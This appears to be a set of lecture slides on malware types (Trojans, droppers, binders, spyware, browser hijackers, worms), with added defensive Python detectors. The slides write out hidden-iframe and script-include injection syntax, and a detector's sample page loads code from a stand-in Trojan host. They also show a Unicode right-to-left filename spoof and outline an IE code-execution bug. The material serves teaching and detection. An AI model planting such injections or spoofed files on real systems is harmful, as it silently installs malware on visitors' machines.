Malware
The Attack and Defense of Computers
Dr. 許富皓
Malicious Software (Malware):
Security tools and toolkits
Back doors (trap doors)
Logic bombs
Viruses
Worms
Binders
Droppers
Trojan Horses
Browser Hijacker
Spyware
Rootkit
URL Injection
...
Security Tools and Toolkits
Automatically scan for computer security weaknesses.
Can be used by both security professionals and attackers, e.g. Nessus, COPS, ISS, Tiger, and so on.
Unwittingly release reports to the public.
There are also programs and tool sets whose only function is to attack computers (often used by script kids).
P.S. These tools may damage the systems that install them or may contain booby-traps that will compromise the systems that install them.
Logic Bombs
A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files (and the salary database) should he ever leave the company. Logic bombs are usually written by insider programmers.
Logic Bombs and Viruses and Worms
Software that is inherently malicious, such as viruses and worms, often contains logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. Many viruses attack their host systems on specific dates, such as Friday the 13th or April Fool's Day. Trojans that activate on certain dates are often called "time bombs".
Key Logger
A program or hardware device that captures every key depression on the computer. Also known as "Keystroke Cops," they are used to monitor a user's activities by recording every keystroke the user makes, including typos, backspacing, and retyping.
Security Concerns about Key Loggers
Keystroke logging can be achieved by both hardware and software means.
There is no easy way to prevent keylogging software from being installed on your PC, as it is usually done by stealth. If you are using a home PC, it is likely to be free of any keystroke logging hardware (but remember there may be keystroke logging software).
Precautions against Key Loggers
Try to avoid typing private details on public PCs. Always try to avoid visiting sites on public PCs that require you to enter your login details, e.g. an online banking account.
Example: Ardamax Keylogger [1]
URL Injection
Changes the URL submitted to a server belonging to some or all domains.
Browser Hijacker [Rouse]
A browser hijacker (sometimes called hijackware) is a type of malware program that alters your computer's browser settings so that you are redirected to Web sites that you had no intention of visiting.
Symptoms of Browser Hijackers (1) [Khanse]
Home page is changed.
Default search engine is changed.
You can't navigate to certain web pages, like the home pages of security software.
You get redirected to pages you never intended to visit.
Symptoms of Browser Hijackers (2)
You see ads, or ads pop up on your screen, but these ads are not served by the website.
You see new toolbars added.
You see new Bookmarks or Favorites added.
Your web browser starts running sluggishly.
Infection of Browser Hijackers [Rouse]
A browser hijacker may be installed as part of a freeware installation.
A browser hijacker may also be installed without user permission, as the result of an infected e-mail, a file share, or a drive-by download.
Redirection [PCSTATS]
As well as making changes to your home page and other IE settings, a hijacker may also make entries in the hosts file on your system. This special file directly maps DNS names (web URLs) to IP addresses, so every time you typed certain URLs you might be redirected to the IP address of a sponsored search or porn site instead.
Absolute File Name of file hosts
C:\WINDOWS\SYSTEM32\drivers\etc\hosts
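As an added example (not from the lecture), a small Python checker that parses a hosts file like the one at the path above and reports watched domains that a hijacker has redirected to another address or blocked by pointing them at loopback; the sample file content and the watched-domain list are constructed for illustration.

```python
import ipaddress
import re
from typing import Dict, List

# Constructed sample of a Windows hosts file (not a real capture). The last three
# entries model what a hijacker leaves behind: a bank domain pointed at a rogue
# address and security-vendor sites pointed at loopback so they cannot be reached.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
192.0.2.10      www.example-bank.com          # constructed hijack entry
127.0.0.1       www.example-antivirus.com     # constructed hijack entry
127.0.0.1       update.example-antivirus.com  # constructed hijack entry
"""

# Domains whose presence in the hosts file is never expected; a real deployment
# would load the organisation's own list of sensitive sites here (assumption).
WATCHED_DOMAINS = {
    "www.example-bank.com",
    "www.example-antivirus.com",
    "update.example-antivirus.com",
}
LOOPBACK_OR_NULL = {"127.0.0.1", "::1", "0.0.0.0"}


def parse_hosts(text: str) -> Dict[str, List[str]]:
    """Map each host name to the list of IPs the file assigns to it.
    Comments (everything after '#') and blank or malformed lines are skipped."""
    mapping: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = re.split(r"\s+", line)
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue  # first token is not an IP address: not a hosts entry
        for name in names:
            mapping.setdefault(name.lower(), []).append(ip)
    return mapping


def suspicious_entries(text: str) -> List[str]:
    """Report watched domains the file overrides, distinguishing a redirect
    (mapped to some other address) from a block (mapped to loopback/null)."""
    findings = []
    for name, ips in parse_hosts(text).items():
        if name not in WATCHED_DOMAINS:
            continue
        for ip in ips:
            kind = "blocked via" if ip in LOOPBACK_OR_NULL else "redirected to"
            findings.append(f"{name} {kind} {ip}")
    return findings
```

On a real machine, read the file at the path on the slide and pass its text to suspicious_entries(); an empty list means none of the watched domains is overridden.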
Self-Protection Mechanisms of Browser Hijackers [PCSTATS]
These programs often use a combination of hidden files and registry settings to reinstall themselves after removal, so deleting them or changing your IE settings back may well not work.
Add-on [stackoverflow]
Add-on: essentially anything that can be installed into the browser. This includes, for example, extensions, themes, plug-ins, dictionaries, language packs, and search engines.
Terminologies [alex301]
plug-in = something that must be compiled into an executable and that provides the browser with extra functionality.
extension = something written in a scripting language the browser supports, used to change the browser's functions and operation.
theme = something written in a language the browser supports, used to change the browser's appearance and interface.
addon = plugin + extension + theme = the general term for everything outside the browser proper that is used to modify the browser.
Browser Plug-in [mozillazine]
Plug-ins add new functionality to an application, such as viewing special graphical formats or playing multimedia content in a web browser. Plug-ins also differ from extensions, which modify or add to existing functionality.
Browser Plug-in [wikipedia]
Plug-ins add specific abilities into browsers using application programming interfaces (APIs), allowing third parties to create plug-ins that interact with the browser. The original API was NPAPI, but subsequently Google introduced the PPAPI interface in Chrome.
General Plug-in Framework [wikipedia]
General Plug-in Mechanism [wikipedia]
A host application provides services which the plug-in can use, including a way for plug-ins to register themselves with the host application and a protocol for the exchange of data with plug-ins.
Uses of Browser Plug-ins
Common uses of plug-ins on the web include displaying video in the browser, games, and music playback. Widely used plug-ins include Java, Flash, Quicktime, and Adobe Reader.
Browser Plug-in Form
A plug-in in the context of Mozilla-based applications is a binary component that, when registered with a browser, can display content that the browser itself cannot display natively.
Extension [wikipedia 1][wikipedia 2]
Extensions can be used to modify the behavior of existing features of an application or add entirely new features.
Therefore, after integration, extensions can be seen as part of the browser itself, tailored from a set of optional modules.
Extension technologies (1) [wikipedia]
CSS (Cascading Style Sheets)
DOM (Document Object Model): used to change XUL in real time or to edit HTML that is currently loaded
JavaScript: the primary language of Mozilla browsers
XPCOM (Cross-Platform Component Object Model)
Extension technologies (2) [wikipedia]
XPConnect
XPI (Cross-Platform Installer)
XUL (XML User Interface Language): used to define the UI (User Interface) and interaction with the user
Mozilla Jetpack: a development kit aiming to lower the learning curve and development time for making add-ons
IE Extension [ivy]
Internet Explorer -> Tools -> Manage Addons
Mozilla Firefox [ivy]
Mozilla Firefox -> Tools -> Add-ons -> Extensions
Google Chrome [ivy]
Google Chrome -> Wrench Icon -> Tools -> Extensions
Browser Toolbar [wikipedia]
A browser toolbar is a toolbar that resides within a browser's window. All major web browsers provide support for browser toolbar development as a way to extend the browser's GUI and functionality. Browser toolbars are considered to be a particular kind of browser extension that presents a toolbar.
Binder [CA]
Definition of Binder
A tool that combines two or more files into a single file, usually for the purpose of hiding one of them. A binder compiles the list of files that you select into one host file, which you can rename. A host file is a simple custom compiled program that will decompress and launch the embedded programs. When you start the host, the embedded files in it are automatically decompressed and launched.
Example
When a piece of malware is bound with Notepad, for instance, the result will appear to be Notepad, and appear to run like Notepad, but the piece of malware will also be run.
Program: YAB (Yet Another Binder) User Guide
Embedded Files
The files embedded in a host file are not always binary files; an embedded file can be of any type.
Even if an embedded file is a binary file, it may be a normal program.
Dropper [Wikipedia]
Definition of a Dropper
A dropper is a program (malware component) that has been designed to "install" some sort of malware (virus, backdoor, etc.) on a target system.
Single stage: the malware code can be contained within the dropper in such a way as to avoid detection by virus scanners.
Two stages: the dropper may download the malware to the target machine once activated.
Types of Droppers
Depending on how a dropper is executed, there are two major types of droppers:
those that do not require user interaction, which run by exploiting some vulnerability of the system;
those that require user interaction, which run by convincing the user that they are some legitimate or benign program.
Trojan Horse [Wikipedia]
In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software.
Trojans use false and fake names to trick users into executing them. These strategies are often collectively termed social engineering. A Trojan is designed to operate with functions unknown to the victim.
The useful, or seemingly useful, functions serve as camouflage for these undesired functions.
Properties of Trojan Horses
Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims: even if Trojans replicate and distribute themselves, each new victim must run the program/Trojan. For the above reasons, a Trojan horse's virulence depends on successful implementation of social engineering concepts but does not depend on flaws in a computer system's security design or configuration.
Categories of Trojan Horses
There are two common types of Trojan horses:
a useful piece of software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer-to-peer file sharing utilities;
a standalone program that masquerades as something else, like a game or image file (e.g. firework.jpg.exe in Windows).
Malware Parasitizes inside Trojan Horses
In practice, Trojan Horses in the wild often contain:
spying functions (such as a packet sniffer);
backdoor functions that allow a computer, unbeknownst to the owner, to be remotely controlled from the network, creating a zombie computer.
The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things.
Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.
Example of a Simple Trojan Horse
A simple example of a Trojan horse would be a program named waterfalls.jpg.exe claiming to be a free waterfall picture which, when run, instead begins erasing all the files on the computer.
E-Mail Trojan Horses
On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse's extension might be "masked" by giving it a name such as Readme.txt.exe.
With file extensions hidden, the user would only see Readme.txt and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.
Unicode Control Character 202E Extension Spoofing [劉昱賢][1]
This technique exploits the way the operating system interprets file names: when it encounters a Unicode control character, it changes how the rest of the name is displayed. An attacker can insert specific Unicode control characters into a file name so that the operating system misleads the user when displaying it.
Real filename: 大師兄[202E]gpj.exe
The part in brackets is the Unicode control character 202E. This control code is an invisible character that makes the following characters display from right to left (Right To Left Override). When the operating system interprets and displays the file name, it shows:
Displayed filename: 大師兄exe.jpg
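The two deceptions on the preceding slides (a double extension masked by Explorer's "hide extensions" setting, and the U+202E right-to-left override) can both be checked mechanically. The Python example below is added here and is not part of the lecture; it computes both misleading views of a name and the extension the OS actually uses, and the sample names are constructed.

```python
import os

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE, the control character the slides discuss
# Unicode bidi controls that can reorder how a name is drawn (U+202A..U+202E, U+2066..U+2069)
BIDI_CONTROLS = {chr(c) for c in range(0x202A, 0x202F)} | {chr(c) for c in range(0x2066, 0x206A)}
# Extensions Windows runs as programs: the slide's list plus .cmd/.vbs/.js (assumption)
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".pif", ".cmd", ".vbs", ".js"}


def rlo_display(name: str) -> str:
    """Approximate what a bidi-aware file manager draws: text after the first
    U+202E is laid out right-to-left, i.e. appears reversed, and the control
    character itself is invisible."""
    if RLO not in name:
        return name
    head, tail = name.split(RLO, 1)
    return head + tail[::-1]


def hidden_ext_display(name: str) -> str:
    """What Explorer shows when 'Hide extensions for known file types' is on:
    only the final extension is dropped, so Readme.txt.exe becomes Readme.txt."""
    stem, ext = os.path.splitext(name)
    return stem if ext else name


def real_extension(name: str) -> str:
    """The extension the OS actually uses to pick the handler: bidi controls
    are ignored, and the last dot-suffix wins."""
    cleaned = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return os.path.splitext(cleaned)[1].lower()


def analyse_filename(name: str) -> dict:
    """Return the two deceptive views of a name and the reasons it looks spoofed."""
    reasons = []
    ext = real_extension(name)
    cleaned = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    if any(ch in BIDI_CONTROLS for ch in name):
        reasons.append("bidi control character in file name")
    if ext in EXECUTABLE_EXTS and cleaned.count(".") >= 2:
        reasons.append(f"double extension hides executable type {ext}")
    if ext in EXECUTABLE_EXTS and os.path.splitext(rlo_display(name))[1].lower() != ext:
        reasons.append("displayed extension differs from real extension")
    return {
        "real_ext": ext,
        "shown_with_hidden_ext": hidden_ext_display(name),
        "shown_with_rlo": rlo_display(name),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }
```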
Commonly Used Methods of Infection
E-mails.
Downloaded Files.
Emails and Trojan Horses
The majority of Trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails: the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a Trojan or virus.
Downloaded Files
The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or delivered on a CD or floppy disk.
Precautions against Trojan Horses (1)
Trojan Horses are commonly spread through e-mail, much like other types of common viruses. The best ways to protect yourself and your company from Trojan Horses are as follows: If you receive e-mail from someone that you do not know, or you receive an unknown attachment, never open it right away. As an e-mail user you should confirm the source. P.S.: Some hackers have the ability to steal address books, so if you see e-mail from someone you know, that does not necessarily make it safe.
Precautions against Trojan Horses (2)
When setting up your e-mail client, make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this, it would be best to purchase one or download one for free.
Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on; that way, if you forget to update your software, you can still be protected from threats.
Precautions against Trojan Horses (3)
Avoid using peer-2-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella because 1) those programs are generally unprotected from Trojan Horses and 2) Trojan Horses are especially easy to spread through these programs. Some of these programs do offer some virus protection, but often it is not strong enough.
Precautions against Trojan Horses (4)
NEVER download blindly from people or sites which you aren't 100% sure about.
However, legitimate web sites may be compromised by attackers who modify web pages to contain scripts that download malware. Even if the file comes from a friend, you still must be sure what the file is before opening it.
Ask your friend whether she/he sent the files to you.
Beware of hidden file extensions (under Windows, susie.jpg.exe is only shown as susie.jpg). Never use features in your programs that automatically get or preview files (Outlook preview mode).
Never blindly type commands that others tell you to type, or go to web sites mentioned by strangers.
Well-known Trojan Horses
Back Orifice
Back Orifice 2000
Beast Trojan
NetBus
SubSeven
Downloader-EV
Pest Trap
flooder
Tagasaurus
Vundo trojan
Gromozon Trojan
List of Trojan Horses
http://en.wikipedia.org/wiki/List_of_trojan_horses
Web Page Trojan Injection (網頁掛馬) [趨勢科技]
Definition [趨勢科技][fanli7]
"網頁掛馬" (planting a Trojan in a web page) is also called a hidden malicious link in a web page. The attacker first designs a special web page (the Trojan page) that targets some vulnerability (usually a Windows or IE vulnerability). When an ordinary user being attacked browses this page, the vulnerability is exploited to silently download a malicious program to the victim's computer and then run it.
Websites
You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of Trojans and other pests. Some of the IE bugs improperly handle data (such as HTML or images) by executing it as a legitimate program. Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.
Features vs. Risks
The more "features" a web browser has, the higher your risk of having security holes that can be exploited by a Trojan horse, for example ActiveX objects, some older versions of Flash, and Java.
Example 1: Microsoft IE window() Arbitrary Code Execution Vulnerability [Secunia]
The vulnerability is caused by certain objects not being initialized correctly when the window() function is used in conjunction with the onLoad event. This can be exploited to execute arbitrary code on a vulnerable browser via some specially crafted JavaScript code called directly when a site has been loaded.
Successful exploitation requires that the user is e.g. tricked into visiting a malicious website.
Example: PROOF OF CONCEPT
Explanation [Computer Terrorism]
[HTML Code Tutorial]
The browser triggers onLoad when the document is finished loading. The contents of onLoad is one or more JavaScript commands.
So, for example, a <body> tag whose onLoad attribute calls alert() tells the browser to bring up an alert box once the page is completely loaded.
MS IE - Crash on JavaScript window() - calling (1)
There is a bug in Microsoft Internet Explorer which causes it to crash. The bug occurs because Microsoft Internet Explorer can't handle a call to a JavaScript function with the name of the "window" object (an object used in JavaScript).
MS IE - Crash on JavaScript window() - calling (2) [Symantec]
Internet Explorer fails to properly initialize the JavaScript `Window()' function. When the 'onLoad' handler is set to call the improperly initialized `Window()' function, the Web browser attempts to call the address 0x006F005B, which is derived from the Unicode representation of 'OBJECT'.
CALL DWORD [ECX+8]
1. Crash, if pointing to non-code.
2. Execution, if pointing to code.
It is shown that JavaScript prompt boxes can be used by attackers to fill the memory region at 0x00600000 with attacker-supplied data, allowing executable machine code to be placed into the required address space.
Dangerous Web Site
The web site pointed to by the following URL is one containing the trap described in the previous slides.
HTTP MSIE JavaScript OnLoad Rte CodeExec [Symantec]
http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
Microsoft Outlook
If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images and actually uses much of the same code to process these as Internet Explorer.
Example 2: Trojan Horse Exploits Image Flaw [Declan McCullagh et al.]
EasyNews, a provider of Usenet newsgroups, said it has identified two JPEG images that take advantage of a previously identified flaw (a heap-based buffer overflow [Michael Cobb]) in the way Microsoft software handles graphics files.
Windows users could have their computers infected merely by opening one of those Trojan horse images.
Attackers tried to use these JPEGs to download Trojan horse programs to vulnerable computers.
Example 3: Compromise a Web Server and Add Hidden Download Instructions in Web Pages (網站掛馬)
Create a frame with size 0.
Web Site Trojan Injection Syntax (網站掛馬語法) [OpenBlue]
Usually, after a site has been compromised through a [vulnerability] or [SQL injection] and a Trojan planted, the [injection syntax] appears in the [first or last line] of the affected web page.
Frame (iframe) injection. Part of the syntax is as follows (木馬網址 stands for the Trojan URL):
<iframe src="木馬網址" width=0 height=0></iframe>
JScript file injection. First save the following syntax as xxx.js (the string argument is not preserved in the transcript):
document.write("");
Then insert this file's URL into the target by whatever means. For example, the JScript injection syntax is:
<script src="xxx.js"></script>
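As an added example, not part of the lecture or the cited OpenBlue post, a Python scanner that flags the two injection forms above (zero-size or hidden iframes, and script includes from unexpected hosts) in a page's HTML and notes whether each sits in the first or last lines; the sample page and the trusted-host list are constructed assumptions.

```python
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample page, not a real capture: an ordinary shop page whose last
# two body lines carry the two injection forms the slides show (a zero-size
# iframe and an include of an external .js file).
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="/js/app.js"></script></head>
<body><p>Welcome to the shop</p>
<iframe src="http://trojan.example/hm.htm" width=0 height=0></iframe>
<script src="http://trojan.example/xxx.js"></script>
</body></html>"""

# Hosts from which script includes are expected; "" covers relative URLs.
# In practice this comes from the site's own configuration (assumption).
TRUSTED_SCRIPT_HOSTS = {"", "www.shop.example"}


def _is_hidden_size(value: str) -> bool:
    """True for width/height values that make a frame invisible (0, 0px, 1, ...)."""
    value = value.strip().lower().rstrip("px").rstrip("%")
    try:
        return float(value) <= 1
    except ValueError:
        return False


class InjectionScanner(HTMLParser):
    """Collects iframes that are effectively invisible and script includes
    from hosts not on the trusted list, with the line each appears on."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict[str, object]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        a = {k: (v or "") for k, v in attrs}
        line, _ = self.getpos()
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if (_is_hidden_size(a.get("width", "")) or _is_hidden_size(a.get("height", ""))
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append({"line": line, "kind": "hidden iframe", "src": a.get("src", "")})
        elif tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname or ""
            if host.lower() not in TRUSTED_SCRIPT_HOSTS:
                self.findings.append({"line": line, "kind": "external script", "src": a["src"]})


def scan_page(html: str) -> List[Dict[str, object]]:
    """Scan one page and mark findings that sit in the first or last two lines,
    where the slides say injected lines are usually placed."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    total = html.count("\n") + 1
    for f in scanner.findings:
        f["at_edge"] = f["line"] <= 2 or f["line"] >= total - 1
    return scanner.findings
```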
Precautions against Trojan Injection (掛馬)
Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses.
Software developers like Microsoft offer patches that in a sense "close the hole" that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches, your computer is kept much safer.
Spyware [Wikipedia]
A Large Number of Toolbars, Some Added by Spyware, Overwhelm an IE Session
Some Statistics about Spyware [A. Moshchuk et al.][Webroot]
2005: A scan (2005) performed by AOL/NCSA of 329 customers' computers found that 80% were infected with spyware programs. Each infected computer contained an average of 93 spyware components.
2006: Despite the publicity about the dangers of spyware, infection rates are on the rise. Webroot spyware scan data shows that 89 percent of consumer PCs are infected with spyware. U.S. home computer users are infected with an average of 30 pieces of spyware on their PCs.
Definition of Spyware
Spyware is computer software that is installed surreptitiously on a personal computer to monitor, intercept, or take partial control over the user's interaction with the computer, without the user's informed consent.
Activities of Spyware
Spyware programs can secretly monitor the user's behavior and then send this information to a hacker over the Internet;
collect various types of personal information;
interfere with user control of the computer in other ways, such as installing additional software, redirecting Web browser activity, or diverting advertising revenue to a third party.
Spyware Functions [A. Moshchuk et al.]
Types of Information Collected by Spyware
Spyware can collect many different types of information about a user. More benign programs can attempt to track what types of websites a user visits and send this information to an advertisement agency.
More malicious versions can try to record what a user types to try to intercept passwords or credit card numbers.
OSes vs. Spyware
As of 2006, spyware has become one of the preeminent security threats to computer systems running Microsoft Windows OSes. Some malware on the Linux and Mac OS X platforms has behavior similar to Windows spyware, but to date has not become anywhere near as widespread.
Spyware Certification
The Spyware-Free Certification program evaluates software to ensure that the program does not install or execute any form of malicious code.
Typical Tactics Adopted by Spyware
Delivery of unsolicited pop-up advertisements.
Monitoring of Web-browsing activity for marketing purposes.
Theft of personal information.
Adware (1) [wikipedia]
Adware, or advertising-supported software, is any software package which automatically plays, displays, or downloads advertisements to a computer. These advertisements can be in the form of a pop-up.
They may also be in the user interface of the software or on a screen presented to the user during the installation process.
Adware (2) [wikipedia]
The object of adware is to generate revenue for its author. Adware, by itself, is harmless; however, some adware may come with integrated spyware such as keyloggers and other privacy-invasive software.
Spyware and Pop-up Ads
Spyware displays advertisements related to what it finds from spying on you, not the ones posted by advertisers. Claria Corporation's Gator Software and Exact Advertising's BargainBuddy provide examples of this sort of program. Visited Web sites frequently install Gator on client machines in a surreptitious manner, and it directs revenue to the installing site and to Claria by displaying advertisements to the user.
The user experiences a large number of pop-up advertisements.
Pop-up Ads
Pop-up ads or popups are a form of online advertising on the World Wide Web. They work when certain web pages open a new web browser window to display advertisements.
Creation of Pop-up Window
The pop-up window containing an advertisement is usually generated by JavaScript, but can be generated by other means as well.
Pop-under Ads
A variation on the pop-up window is the pop-under advertisement. This opens a new browser window behind the active window.
Pop-unders interrupt the user less, but are not seen until the desired windows are closed, making it more difficult for the user to determine which Web page opened them.
Dozens of Pop-up Ads Cover a Desktop.
Web Activity Monitor
Spyware behavior, such as reporting on websites the user visits, frequently accompanies the displaying of advertisements. Monitoring web activity aims at building up a marketing profile on users in order to sell "targeted" advertisement impressions.
Other Victims of Spyware
The prevalence of spyware has cast suspicion upon other programs that track Web browsing, even for statistical or research purposes. Some observers describe the Alexa Toolbar, an Internet Explorer plug-in published by Amazon.com, as spyware (and some anti-spyware programs report it as such) although many users choose to install it.
Identity Theft and Fraud
Some spyware is closely associated with identity theft. Spyware may transmit the following information to attackers: chat sessions, user names, passwords, bank information, etc. Spyware has principally become associated with identity theft in that keyloggers are routinely packaged with spyware. John Bambenek, who researches information security, estimates that identity thieves have stolen over US$24 billion of account information in the United States alone.
Routes of Infection
Spyware does not directly spread in the manner of a computer virus or worm: generally, an infected system does not attempt to transmit the infection to other computers. Instead, spyware gets on a system through deception of the user or through exploitation of software vulnerabilities.
Masquerade
One way of distributing spyware involves tricking users by manipulating security features designed to prevent unwanted installations.
Masquerade - Example
The Internet Explorer Web browser, by design, prevents websites from initiating an unwanted download. Instead, a user action (such as clicking on a link) must normally trigger a download. However, links can prove deceptive. For instance:
1. A pop-up ad may appear like a standard Windows dialog box.
2. The box contains a message such as "Would you like to optimize your Internet access?" with links which look like buttons reading Yes and No.
3. No matter which "button" the user presses, a download starts, placing the spyware on the user's system.
A Masquerade Example
Malicious websites may attempt to install spyware on readers' computers. In this screenshot a website has triggered a pop-up that offers spyware in the guise of a security upgrade.
Bundled with Shareware
Spyware can also come bundled with shareware, other downloadable software, or music CDs. The user downloads a program (for instance, a music program or a file-trading utility) and installs it, and the installer additionally installs the spyware. Although the desirable software itself may do no harm, the bundled spyware does. In some cases, spyware authors have paid shareware authors to bundle spyware with their software. In other cases, spyware authors have repackaged desirable free software with installers that add spyware.
Bundled Shareware Example
The BearShare file-trading program, "supported" by WhenU spyware. In order to install BearShare, users must agree to install "the SAVE! bundle" from WhenU. The installer provides only a tiny window in which to read the lengthy license agreement. Although the installer claims otherwise, the software transmits users' browsing activity to WhenU servers.
Through Trojan Horse
Classically, a Trojan horse, by definition, smuggles in something dangerous in the guise of something desirable. Some spyware programs get spread in just this manner. The distributor of spyware presents the program as a useful utility, for instance as a Web accelerator or as a helpful software agent. Users download and install the software without immediately suspecting that it could cause harm.
Vulnerabilities in Web Browsers
Some spyware authors infect a system by attacking security holes in the Web browser or in other software. When the user navigates to a Web page controlled by the spyware author, the page contains code which attacks the browser and forces the download and installation of spyware.
Common browser exploits target security vulnerabilities in Internet Explorer and in the Microsoft Java runtime.
Notable Programs Distributed with Spyware
Messenger Plus!
Bearshare
Bonzi Buddy
Morpheus
RadLight
WeatherBug
EDonkey2000 (only if you agree to install their "sponsor" program)
DAEMON Tools (only if you agree to install their "sponsor" program)
DivX (except for the paid version, and the "standard" version without the encoder). DivX announced removal of GAIN software from version 5.2.
Dope Wars
ErrorGuard
FlashGet
Grokster (free version)
Kazaa
Worm
Worms
Worms spread themselves by proactively attacking programs with specific vulnerabilities.
The most frequently used attack approaches include buffer overflow attacks, format string attacks, integer overflow attacks, and so on.
Examples: Morris Worm (1988), Code Red, Slammer.
Comparisons between Viruses, Trojan Horses, and Worms
The way they behave: How are they triggered? How do they spread? Do they need host programs?